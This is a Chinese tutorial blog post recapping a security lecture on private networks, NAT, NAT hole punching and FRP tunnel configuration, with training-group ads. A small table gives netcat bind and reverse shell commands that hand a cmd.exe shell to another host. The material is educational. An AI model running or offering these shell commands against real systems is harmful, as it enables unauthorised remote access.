内网穿透端口映射内外网反弹 shell 回顾

2024-05-27 19:36

本文主要是介绍内网穿透端口映射内外网反弹 shell 回顾,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

内网穿透&端口映射&内外网反弹 shell 回顾


内网概念

  • 我们常说的内网,一般指的是非公有 IPv4 地址的网络
  • 比如学校机房里的电脑一般为私有网络,家里的网络也是私有网络

私有网络的范围与划分

ipaddressarea
A 类地址10.0.0.0~10.255.255.255
B 类地址172.16.0.0 ~172.31.255.255
C 类地址192.168.0.0~192.168.255.255

image-20220620191736728

培训、环境、资料、考证
公众号:Geek极安云科
网络安全群:624032112
网络系统管理群:223627079 
网络建设与运维群:870959784 
移动应用开发群:548238632
短视频制作群:744125867
大数据应用开发群:962141356 
物联网应用与服务群:967579409
物联网应用开发群:884879404极安云科校企合作经理VX liuliu5488233极安云科专注于技能提升,赋能
2024年广东省高校的技能提升,受赋能的客户院校均获奖!
2024年江苏省赛一二等奖前13名中,我们赋能客户占五支队伍!
2024年湖南省赛赋能三所院校均获奖!
2024年山东省赛赋能两所院校均获奖!
2024年湖北省赛赋能参赛院校九支队伍,共计斩获一等奖2项、三等奖7项!

外网概念

  • 外网一般持有全球唯一的 IPv4 地址
  • 比如我的腾讯云服务器:114.132.218.55

为什么要讲内外网?

  • 内网 IP 可达外网 IP,与之交互
  • 外网 IP 则无法直接找到内网 IP

Netcat 实验

  • 内网连接内网(正、反)
  • 内网连接外网(反)
  • 外网连接内网(正)
  • 外网连接外网(正、反)
被攻击 PCOur PCexplanation
nc -e cmd.exe -lvnp 1234nc 10.10.10.1 1234正向 shell
nc -e cmd.exe 10.10.10.4 1234nc -lvnp 1234反向 shell

NAT 概念

网络地址转换(Network Address Translation,NAT)

NAT 是一种将私有(保留)地址转化为合法 IP 地址的转换技术

  • 它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中
  • NAT 可以完成重用地址,并且对于内部的网络结构可以实现对外隐蔽。
  • NAT 设备自动屏蔽了非内网主机主动发起的连接

为什么要使用 NAT

	IPv4 网络地址紧缺,从而出现了私有网段,来补充地址,但私有网段不可访问 internet 所以出现了 NAT 地址转换,将私有地址,转换为公网 IP 从而访问 internetNAT 的作用也就在于:将私有IP地址,转化为公网的合法 IP

NAT 实验解析

端口映射

该理论已被收录至空间安全理论

内网穿透

内网穿透,也叫 NAT 穿透

进行内网穿透的目的:使用内网穿透是为了使具有某一个特定源 IP 地址源端口号的数据包,不被 NAT 设备屏蔽而正确路由到内网主机

应用在身边的内网穿透技术

  • 电脑两节点音频接收、转发

为什么要使用内网穿透

  • NAT 设备自动屏蔽了非内网主机主动发起的连接。从外网发往内网的数据包将被 NAT设备丢弃
  • 位于不同 NAT 设备之后的主机之间无法直接交换信息
  • 外部主机要与内网主机相互通信,必须由内网主机主动发起连接
  • 虽然保护了内网主机免于来自外部网络的攻击,另一方面也为 P2P 通信带来了一定困难

穿透模拟-通信双方一台 PC 位于 NAT 之后

环境:

PC A:拥有内网 IP,能够出网(NAT 转换)
PC B:拥有公网 IP,能够直接出网

如下图一般:

image-20220701130854572

  • PC A 位于 NAT 之后,并有用 IP 地址和对应端口 192.168.1.100:1234
  • PC B 位于 NAT 之前,并拥有 IP 地址和对应端口 218.5.18.2:1234
  • PC A 出网借助 NAT 转换,公网地址为 114.5.2.3

  • 由于 PC B 有一个公网 IP,所以 PC A 可以直接通过 TCP 协议连接到它的 IP 地址 ``
  • 然而如果 PC B 向 PC A 主动发起连接,则不会成功

此时就需要一个公有的服务器辅助进行内网穿透

  1. PC A 和 PC B 向服务器发起登录请求,并保持一个 TCP 或 UDP 连接
  2. 服务器记录他俩的 IP 地址和端口号

这里服务器对 PC A 是记录经过 NAT 转换之后的 IP 和端口号

  1. 当 PC B 想连接 PC A 时,首先向服务器提出请求,服务器在收到请求后向 PC A 发出打洞命令,并讲 PC B 的 IP 地址和端口号发送给 PC A
  2. PC A 根据收到 IP 地址和端口号向 PC B 发起 TCP 或 UDP 连接
  3. 最终 PC A 和 PC B 之间便可建立数据传输通道

穿透模拟-通信双方 PC 都位于 NAT 之后

环境:

两台主机都处于内网中,拥有出网条件(NAT 转换)

如下图一般:

image-20220701133313030

  • PCA 位于 NAT 之后,并有用 IP 地址和对应端口 192.168.1.100:1234
  • PCB 位于 NAT 之后,并拥有 IP 地址和对应端口 172.24.1.100:6000
  • PCA 出网借助 NATA 转换,公网地址为 218.5.18.2:51200
  • PCA 出网借助 NATB 转换,公网地址为 114.5.2.3:5000

服务器记录的 IP:端口 是 PCA 和 PCB 经过 NAT 转换之后的 IP:端口

此时,PCA 和 PCB 之间任意一方的连接请求都会被对方的 NAT 设备屏蔽

  1. PC A 首先向服务器提出连接请求,服务器将 PCA 的 NAT 218.5.18.2:51200 发送给 PCB,并向 PCB 发出打洞命令
  2. PCB 收到服务器的打洞命令后,首先向 PCA 的 NAT 地址 218.5.18.2:51200 发送一定数目的 UDP 探测包或 TCP 连接请求,然后在 NATB 上打一个方向为 218.5.18.2:51200 的洞
  3. PCB 向服务器报告打洞完成
  4. 服务器收到 PCB 的报告后,将 PCB 的公网 IP 地址和端口号 114.32.4.251:5000 发送给 PCA
  5. 此时 NATB 以及留下对应于 NATA 的 218.5.18.2:51200 洞,PCA 向 114.32.4.251:5000 将不会被丢弃 (这与端口映射的原理很相似)

内网穿透原理总结

  • NAT设备(或软件)维护一个状态表,用来把内部网络的私有 IP 地址映射到外部网络的合法 IP 地址上去

  • 每个包头中的 IP 地址和端口信息在 NAT 设备(或软件)中都被修改并翻译成一正确的 IP 地址发往下一级

  • 当一个内网主机通过 NAT 打开一个“外出”的 TCP 或 UDP 会话时,NAPT 分配给这个会话一个公网 IP 和端口,用来接收外网的响应的数据包,并经过转换通知内部网的主机

  • 这样,NAPT在 [私有IP:私有端口][公网IP:公网端口] 之间建立了一个端口绑定。

应用 FRP 内网穿透技术-使 PC 达到公网可寻

FRP Server 端配置

[common]
bind_port = 7000
dashboard_port = 7500
token = qwese.
dashboard_user = admin
dashboard_pwd = qwese.
vhost_http_port = 10080
vhost_https_port = 10443
tls_enable = true

FRP Client 端配置

client 端也就是我们要端口映射的对象,这里映射为 HTTP 协议

[common]
server_addr =114.132.218.55
server_port = 7000
token = qwese.[perse.windowsPC-http2]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 9002

image-20220701160420035

应用 FRP 点对点内网穿透技术-PC 达到公网可寻

http://blog.demon.ren/685.htm

后言

我自己想了一下,我没敢去看,上次那课实在是讲太烂了

我也是第一次讲课,很多地方没有讲好,这是没法避免的,所以我也尽力在让自己讲好,在改变

所有学习的过程都是这样,不一定是在安全技术上

不能说,学安全就高人一等,学艺术,学文学,学数学,学哲学就高人一等

而是我们能否在学习的过程中,保持一个学徒的心

都说人看的多了,学的多了,就知道自己的渺小了,因为眼界和想法跟以前不一样

虽然我们的课听的人少,但是我也希望能把技术和思路都尽数教给大家,虽然我们的技术不在一个层面,哈哈这是时间的问题,我相信大家总有一天说不定也能超过我

再说说为什么我们叫深蓝网络安全啊,先前我和你们坤哥创建了这么一个安全团队,但实际上就咋一个老 B 登在负责安全方面的一些技术,咋们之前本来想叫个 Perse 安全,意为恒心,希望在学习安全技术上,能够保持初心,啊不要去碰黑产对吧,同样也不要去做一些破坏他人安全和隐私的事,我们学这些说大了是为了国家网络空间安全,说小了哎,就是我想学,想装逼,想赚钱

但是我也希望能把技术和思路都尽数教给大家,虽然我们的技术不在一个层面,哈哈这是时间的问题,我相信大家总有一天说不定也能超过我

再说说为什么我们叫深蓝网络安全啊,先前我和你们坤哥创建了这么一个安全团队,但实际上就咋一个老 B 登在负责安全方面的一些技术,咋们之前本来想叫个 Perse 安全,意为恒心,希望在学习安全技术上,能够保持初心,啊不要去碰黑产对吧,同样也不要去做一些破坏他人安全和隐私的事,我们学这些说大了是为了国家网络空间安全,说小了哎,就是我想学,想装逼,想赚钱

所以我希望大家,能够多多评论和思考以及多问一些问题,并去实践我们每节课的演练过程

这篇关于内网穿透端口映射内外网反弹 shell 回顾的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1008398

相关文章

【Linux进阶】UNIX体系结构分解——操作系统,内核,shell

1.什么是操作系统? 从严格意义上说,可将操作系统定义为一种软件,它控制计算机硬件资源,提供程序运行环境。我们通常将这种软件称为内核(kerel),因为它相对较小,而且位于环境的核心。  从广义上说,操作系统包括了内核和一些其他软件,这些软件使得计算机能够发挥作用,并使计算机具有自己的特生。这里所说的其他软件包括系统实用程序(system utility)、应用程序、shell以及公用函数库等

利用Frp实现内网穿透(docker实现)

文章目录 1、WSL子系统配置2、腾讯云服务器安装frps2.1、创建配置文件2.2 、创建frps容器 3、WSL2子系统Centos服务器安装frpc服务3.1、安装docker3.2、创建配置文件3.3 、创建frpc容器 4、WSL2子系统Centos服务器安装nginx服务 环境配置:一台公网服务器(腾讯云)、一台笔记本电脑、WSL子系统涉及知识:docker、Frp

免费内网穿透工具 ,快解析内网穿透解决方案

在IPv4公网IP严重不足的环境下,内网穿透技术越来越多的被人们所使用,使用内网穿透技术的好处有很多。 1:无需公网ip 物以稀为贵,由于可用的公网IP地址越来越少,价格也是水涨船高,一个固定公网IP一年的成本要上万,而使用内网穿透技术则不需要公网IP的支持。 2:提高安全性 使用内网穿透技术,无需在路由器映射端口,我们知道黑客通常会使用端口扫描来寻找攻击对象,不映射端口能大大提高服务器的安全

hbase中shell命令

HBase scan命令详解 - 简书https://www.jianshu.com/p/0ccfd59d73f4 Hbase中多版本(version)数据获取办法_牛奋lch-CSDN博客_hbase 多版本前言:本文介绍2种获取列的多版本数据的方式:shell和spring data hadoop一、hbase shell中如何获取    1、在shell端创建一个Hbase表create

Shell语法全解

Shell基础语法全解 一、shell简介二、shell格式2.1 新建一个shell脚本文件2.2 执行脚本方式 三、变量3.1系统变量3.2自定义变量3.3 特殊变量3.3.1 `$n` 传入变量3.3.2 `$#` 输入参数个数3.3.3 `$*`、`$@` 输入参数内容3.3.4 `$?` 上一条命令执行结果 四、运算符 `$[]`、`$(())`五、条件判断5.1判断数值大小5.

Android常用命令行——gradlew,adb,adb shell

gradlew 下面全是针对 windows 操作系统的。如果是 Linux / Mac 请直接用 ./ 前缀。 gradlew clean //类似Clean Project gradlew -v //查看Gradle、Groovy、Ant、JVM等的版本gradlew build --info //编译并打印日志gradlew dependencies --info //查看详细的依

shell的正则表达式

一、正则表达式:匹配的是文本内容(文本三剑客:grep:过滤文本内容       sed:针对文本内容进行增删改查        awk:按行取列) 二、grep:过滤 1.grep:过滤文本内容,作用就是使用正则表达式来匹配文本内容。    grep命令格式:grep -m 1 “bash”  /etc/passwd                             cat  /e

Linux——Shell脚本

重头戏终于来了! 一、Shell脚本简介 shell script 是利用 shell 的功能所写的一个『程序 (program)』,这个程序是使用纯文本文件,将一些 shell 的语法与指令(含外部指令)写在里面, 搭配正规表示法、管线命令与数据流重导向等功能,以达到我们所想要的处理目的。 #!/bin/bash 在宣告这个 script 使用的 shell 名称。 用vi test.s

从PATH说起的shell命令行替换

许久之前,师弟问了我一个问题,为什么shell中添加环境变量的写法是下面这种方式 PATH=~/.lib:$PATH; export PATH 而下面这种会报错呢? $PATH=~/.lib:$PATH; export PATH 当时我的回答是,"shell就是这样子规定的呀"。 回答的同时,也突然间发现有些自己感觉很熟悉的概念,原来自己并没有那么清楚,因此这一篇讲讲shell的命令行

shell脚本基础--2

shell中变量的用法 使用变量的情况: 1.当脚本中使用某个字符串较频繁并且字符串长度很长时就应该使用变量代替 2.使用条件语句时,常使用变量判断大小 if [ $a -gt 1 ]; then … ; fi 3.引用某个命令的结果时,用变量替代 n=wc -l test.txt 4.写和用户交互的脚本时,变量也是必不可少的 : [root@linux ~]# read -p "input